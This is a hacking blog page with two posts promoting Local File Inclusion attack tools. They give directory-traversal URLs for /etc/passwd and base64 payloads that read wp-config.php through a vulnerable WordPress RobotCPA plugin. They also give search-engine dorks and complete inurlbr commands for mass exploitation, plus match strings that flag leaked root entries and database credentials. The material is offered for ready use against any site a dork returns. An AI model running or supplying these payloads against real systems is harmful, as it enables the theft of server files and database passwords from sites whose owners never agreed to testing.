Parceiro: Camisetas Hacker

Camisetas para Nerds & Hackers

Mostrando postagens com marcador Local File Inclusion. Mostrar todas as postagens
Mostrando postagens com marcador Local File Inclusion. Mostrar todas as postagens

domingo, 5 de julho de 2015

Tool lfiINURL - exploring Local File Inclusion

lfiINURL
Tool Description

The script runs tests searching for the directory that contains the password file server / directory traversal Exemple:
Tool Description  The script runs tests searching for the directory that contains the password file server / directory traversal Exemple:

http://target.br/file.php?open=/etc/passwd
http://target.br/file.php?open=../etc/passwd
http://target.br/file.php?open=../../etc/passwd
http://target.br/file.php?open=../../../etc/passwd
http://target.br/file.php?open=../../../../etc/passwd

AUTOR:        googleINURL
EMAIL:        [email protected]
Blog:         http://blog.inurl.com.br
Twitter:      https://twitter.com/googleinurl
Fanpage:      https://fb.com/InurlBrasil
Pastebin      http://pastebin.com/u/Googleinurl
GIT:          https://github.com/googleinurl
PSS:          http://packetstormsecurity.com/user/googleinurl
YOUTUBE:      http://youtube.com/c/INURLBrasil
PLUS:         http://google.com/+INURLBrasil

Vulnerability Description

Local File Inclusion (also known as LFI) is the process of including files, that are already locally present on the server, through the exploiting of vulnerable inclusion procedures implemented in the application. This vulnerability occurs, for example, when a page receives, as input, the path to the file that has to be included and this input is not properly sanitized, allowing directory traversal characters (such as dot-dot-slash) to be injected. Although most examples point to vulnerable PHP scripts,we should keep in mind that it is also common in other technologies such as JSP, ASP and others.

In successful cases If the above mentioned conditions are met, an attacker would see something like the following:

root:x:0:0:root:/root:/bin/bash
bin:x:1:1:bin:/bin:/sbin/nologin
daemon:x:2:2:daemon:/sbin:/sbin/nologin
alex:x:500:500:alex:/home/alex:/bin/bash
margo:x:501:501::/home/margo:/bin/bash

Download tool lfiINURL
https://github.com/googleinurl/lfiINURL

COMMAND EXPLOIT --help

   -t : SET TARGET.
   -c : COUNT DIR.
        ex: -c   3 = /etc/passwd, ../etc/passwd, ../../etc/passwd ...
   Execute:
                 php lfiINURL.php -t target.br/index.file?= -c 50

Demonstration execution
Demonstration execution

USE SCANNER INURLBR MASS EXPLOIT COMMAND EXEMPLE
Download scanner inurlbr 1.0
https://github.com/googleinurl/SCANNER-INURLBR

inurlbr.php --dork 'br+index.p=' -s vull.txt -q all --command-all 'URL="_TARGETFULL_&index.p=" && php lfiINURL.php -t $URL -c 10'

inurlbr.php --dork 'include=' -s vull.txt -q all --command-all 'URL="_TARGETFULL_&include=" && php lfiINURL.php -t $URL -c 10'

inurlbr.php --dork 'cn+page=' -s vull.txt -q all --command-all 'URL="_TARGETFULL_&page=" && php lfiINURL.php -t $URL -c 10'

inurlbr.php --dork 'cn+page=' -s vull.txt -q all --command-all 'URL="_TARGETFULL_&page=" && php lfiINURL.php -t $URL -c 10'

# OBS USE UNIX

Demonstration execution xpl + inurlbr
Demonstration execution xpl + inurlbr


References
[1] https://www.owasp.org/index.php/Testing_for_Local_File_Inclusion
[2] http://www.wikipedia.org/wiki/Local_File_Inclusion
[3] https://github.com/googleinurl/SCANNER-INURLBR#---definindo-comando-externo

quarta-feira, 24 de junho de 2015

WordPress RobotCPA Plugin V5 - Local File Inclusion - MASS EXPLOIT INURLBR

Exploring theme Plugin RobotCPA V5 CMS wordpress

Exploit Title: Wordpress Plugin RobotCPA V5 - Local File Include Exploit Author: T3N38R15 Vendor Homepage: http://robot-cpa.good-info.co/ Version: 5V Tested on: Windows (Firefox) / Linux (Firefox) Acess: https://www.exploit-db.com/exploits/37252/  The affected file is f.php and the get-parameter "l" is vulnerable to local file inclusion. We just need to base64 encode our injection.

Exploit Title: Wordpress Plugin RobotCPA V5 - Local File Include
Exploit Author: T3N38R15
Vendor Homepage: http://robot-cpa.good-info.co/
Version: 5V
Tested on: Windows (Firefox) / Linux (Firefox)
Acess: https://www.exploit-db.com/exploits/37252/


The affected file is f.php and the get-parameter "l" is vulnerable to local file inclusion.
We just need to base64 encode our injection.

POC:

string exploit:
php://filter/resource=./../../../wp-config.php
base64: cGhwOi8vZmlsdGVyL3Jlc291cmNlPS4vLi4vLi4vLi4vd3AtY29uZmlnLnBocA==

string exploit: 
file:///etc/passwd
base64: 
ZmlsZTovLy9ldGMvcGFzc3dk

Exemple Injetion:
http://domain.com/wp-content/plugins/robotcpa/f.php?l={STRING_BASE64_XPL}

Mass exploitation with inurlbr
using get exploration parameters and scanner internal encoder

Exemple:
--exploit-get {you_get}
--exploit-get  "&index.php?id=10'´0x27"


base64 Encrypt values in base64.
     Example: base64({value})
     Usage:   base64(102030)
     Usage:   --exploit-get 'user?id=base64(102030)'

Let's use:
--exploit-get "&l=base64(file:///etc/passwd)"
or
--exploit-get "&l=base64(php://filter/resource=./../../../wp-config.php)"

Dork:
inurl:"/wp-content/plugins/robotcpa/"
inurl:"plugins/robotcpa/f.php?l="

Complete command
php inurlbr.php --dork 'inurl:"plugins/robotcpa/f.php?l="' --exploit-get "&l=base64(file:///etc/passwd)" -s vuln.txt -q 1,2,3,64

Internal validation script inurlbr

Exploring the server password file...

LOCAL FILE INCLUSION
Local File Inclusion (also known as LFI) is the process of including  files, that are already locally present on the server, through the  exploiting of vulnerable inclusion procedures implemented in the  application. 
https://www.owasp.org/index.php/Testing_for_Local_File_Inclusion
$validation['LOCAL-FILE-INCLUSION-01'] = '/root:/';
$validation['LOCAL-FILE-INCLUSION-02'] = 'root:x:0:0:';
$validation['LOCAL-FILE-INCLUSION-03'] = 'mysql:x:';
Finding any of these values the script alert as vulnerable.
Exploring the server wp-config.php file...

CMS WORDPRESS
As the name suggests, if the web application doesn’t check the file name required by the user, any malicious user can exploit this vulnerability to download sensitive files from the server.
Arbitrary File Download vulnerability file wp-config.php
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-6271
http://www.acunetix.com/vulnerabilities/web/wordpress-plugin-slider-revolution-arbitrary-file-disclosure
$validation['CMS-WORDPRESS-01'] = "define('DB_NAME'";
$validation['CMS-WORDPRESS-02'] = "define('DB_USER'";
$validation['CMS-WORDPRESS-03'] = "define('DB_PASSWORD'";
$validation['CMS-WORDPRESS-04'] = "define('DB_HOST'";
Finding any of these values the script alert as vulnerable.

OUTPUT: 

Download:
http://github.com/googleinurl/SCANNER-INURLBR